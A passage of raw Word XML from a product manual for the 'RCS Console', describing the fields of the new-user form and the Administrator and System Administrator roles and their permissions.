              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the username for access.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00971FFE" w:rsidRPr="00F359AE" w:rsidRDefault="00971FFE" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field</w:t>
            </w:r>
            <w:r w:rsidR="00D560FB" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to be used for storing additional information</w:t>
            </w:r>
            <w:r w:rsidR="00D560FB" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> about the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r w:rsidR="00D560FB" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ser</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D560FB" w:rsidRPr="00F359AE" w:rsidRDefault="00D560FB" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E-mail</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">to be used for storing </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ser’</w:t>
            </w:r>
            <w:r w:rsidR="00B52E90" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s e-mail address, for different purposes.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00971FFE" w:rsidRPr="00F359AE" w:rsidRDefault="00971FFE" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the password for access.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D560FB" w:rsidRPr="00F359AE" w:rsidRDefault="00D560FB" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Roles</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a mandatory block and requires that at least 1 option is checked.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C45694" w:rsidRPr="00F359AE" w:rsidRDefault="00C45694" w:rsidP="00CE0A58">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>See pag</w:t>
            </w:r>
            <w:r w:rsidR="00FF125D">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e 12 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more information.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C45694" w:rsidRPr="00F359AE" w:rsidRDefault="00C45694" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Language</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to personalize your own console language.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C45694" w:rsidRPr="00F359AE" w:rsidRDefault="00C45694" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Console Timezone</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] must be aligned according to the user timezone, to make sure that all the internal data will be shown correctly.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FA0ABE" w:rsidRPr="00F359AE" w:rsidRDefault="00FA0ABE" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00B85AB7" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Groups</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] must be </w:t>
            </w:r>
            <w:r w:rsidR="00B85AB7" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">filled with at least one group from those available. If they are not yet present, this </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="00B85AB7" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration can be performed later.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0098176A" w:rsidRPr="00C93347" w:rsidRDefault="001F386E" w:rsidP="00FF125D">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>See page</w:t>
            </w:r>
            <w:r w:rsidR="00FF125D">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 13 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C45694" w:rsidRDefault="000725FF" w:rsidP="00313178">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When you create (or modify) a </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ser, you </w:t>
      </w:r>
      <w:r w:rsidR="007175AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">may want to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">specify advanced permissions that allow you to increase control over </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">perations that each </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ser can perform within the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F10C2C" w:rsidRDefault="00F10C2C" w:rsidP="0087756C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabel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288"/>
        <w:gridCol w:w="3811"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C45694" w:rsidRPr="00C6266F" w:rsidTr="00240B6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5529" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002175DC" w:rsidRDefault="002175DC" w:rsidP="00794182">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C45694" w:rsidRPr="0098176A" w:rsidRDefault="0010013A" w:rsidP="00794182">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Console ] Accounting &gt; Users</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; New User &gt; Advanced permissions</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:266.75pt;height:480.45pt;z-index:251667456;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId27" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1029" DrawAspect="Content" ObjectID="_1446455337" r:id="rId28"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C45694" w:rsidRDefault="00C45694" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3811" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C45694" w:rsidRPr="00240B6F" w:rsidRDefault="00C45694" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C45694" w:rsidRPr="00240B6F" w:rsidRDefault="00C45694" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BC35DB" w:rsidRPr="00240B6F" w:rsidRDefault="00BC35DB" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">On the left you can see the 4 different roles and related </w:t>
            </w:r>
            <w:r w:rsidR="00427A3E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">default </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>permission</w:t>
            </w:r>
            <w:r w:rsidR="007531A3" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CE0A58" w:rsidRPr="00240B6F" w:rsidRDefault="00CE0A58" w:rsidP="00CE0A58">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BC35DB" w:rsidRPr="00240B6F" w:rsidRDefault="00BC35DB" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Administrator</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00313178" w:rsidRPr="00240B6F" w:rsidRDefault="00313178" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Administrator role </w:t>
            </w:r>
            <w:r w:rsidR="00FA25BF" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">considered </w:t>
            </w:r>
            <w:r w:rsidR="00FA25BF" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the main role for system start-up and </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">continuous </w:t>
            </w:r>
            <w:r w:rsidR="00FA25BF" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">management and it’s the only role allowed to create, modify and delete </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r w:rsidR="00FA25BF" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">sers, </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
            <w:r w:rsidR="00FA25BF" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">roups, </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00FA25BF" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">perations and </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00FA25BF" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>argets.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FA25BF" w:rsidRPr="00240B6F" w:rsidRDefault="00FA25BF" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This role can also access audit logs and change the product license.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BC35DB" w:rsidRPr="00240B6F" w:rsidRDefault="00BC35DB" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>System Administrator</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC35DB" w:rsidRPr="00240B6F" w:rsidRDefault="00313178" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The System Administrator role is the only one allowed to apply changes to the RCS core infrastructure: </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
